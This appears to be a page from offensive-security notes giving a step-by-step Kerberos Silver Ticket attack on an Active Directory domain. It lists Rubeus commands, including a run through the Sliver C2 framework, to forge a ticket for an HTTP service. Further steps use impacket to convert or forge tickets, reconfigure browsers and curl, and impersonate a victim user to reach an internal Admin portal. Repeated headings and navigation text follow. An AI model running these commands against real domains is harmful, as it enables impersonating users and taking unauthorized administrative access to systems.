Silver Ticket

Impersonating a user from a domain group which has access to a web service

Windows

1) Get TGT and see if we can reach the child domain

.\Rubeus.exe hash /password:password123
.\Rubeus.exe asktgt /domain:domain.com /user:username /rc4:ffffffffffffffffffffffffffffffff /nowrap /ptt

2) Generate silver ticket impersonating victim user from prod domain for http service on machine05

.\Rubeus.exe silver /service:HTTP/machine05.domain.com /rc4:ffffffffffffffffffffffffffffffff /user:victim /domain:domain.com /nowrap /ptt /ldap

3) In sliver

rubeus -t 30 -- silver /service:HTTP/machine05.domain.com /rc4:ffffffffffffffffffffffffffffffff /user:victim /domain:domain.com /nowrap /ldap /ptt

4) Open internet explorer, go into intranet settings and add the domain machine05.domain.com into trusted sites after opening

&"C:\Program Files\internet explorer\iexplore.exe"

5) Open the following urls, we're now victim

http://machine05.domain.com/Internal/
http://machine05.domain.com/Internal/Admin

6) To try on Browser, convert the base64 contents we got into .ccache format

echo "doIF5TCCBeGgAwIBBaEDAgDUxMjNaqBMbEURFTktJQUlSLVBST0QuQ09NqS...." | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
klist

7) Open firefox

firefox

8) Set configs

about:config

9) Set the following settings

network.negotiate-auth.trusted-uris = .domain.com
network.negotiate-auth.delegation-uris = .domain.com

10) Reopen firefox and we should be able to access the Admin portal

firefox --new-tab http://machine05.domain.com/Internal/Admin

11) Within linux, this works

curl -k http://machine05.domain.com --negotiate -u :
curl -k http://machine05.domain.com/Internal --negotiate -u :
curl -k http://machine05.domain.com/Internal/Admin --negotiate -u :

Linux

1) Get victim's ticket

impacket-ticketer -nthash ffffffffffffffffffffffffffffffff -domain-sid S-1-5-21-3313635286-3087330321-3553712345 -domain domain.com -spn HTTP/machine05.domain.com victim

2) Check ticket status

klist

3) We can now impersonate victim

curl -k --negotiate -u : http://machine05.domain.com/Internal
curl -k --negotiate -u : http://machine05.domain.com/Internal/Admin

PreviousPersistence NextAD Lateral Movement

Last updated 5 months ago

hashtagWindows

hashtag1) Get TGT and see if we can reach the child domain

hashtag2) Generate silver ticket impersonating victim user from prod domain for http service on machine05

hashtag3) In sliver

hashtag4) Open internet explorer, go into intranet settings and add the domain machine05.domain.com into trusted sites after opening

hashtag5) Open the following urls, we're now victim

hashtag6) To try on Browser, convert the base64 contents we got into .ccache format

hashtag7) Open firefox

hashtag8) Set configs

hashtag9) Set the following settings

hashtag10) Reopen firefox and we should be able to access the Admin portal

hashtag11) Within linux, this works

hashtagLinux

hashtag1) Get victim's ticket

hashtag2) Check ticket status

hashtag3) We can now impersonate victim

Windows

1) Get TGT and see if we can reach the child domain

2) Generate silver ticket impersonating victim user from prod domain for http service on machine05

3) In sliver

4) Open internet explorer, go into intranet settings and add the domain machine05.domain.com into trusted sites after opening

5) Open the following urls, we're now victim

6) To try on Browser, convert the base64 contents we got into .ccache format

7) Open firefox

8) Set configs

9) Set the following settings

10) Reopen firefox and we should be able to access the Admin portal

11) Within linux, this works

Linux

1) Get victim's ticket

2) Check ticket status

3) We can now impersonate victim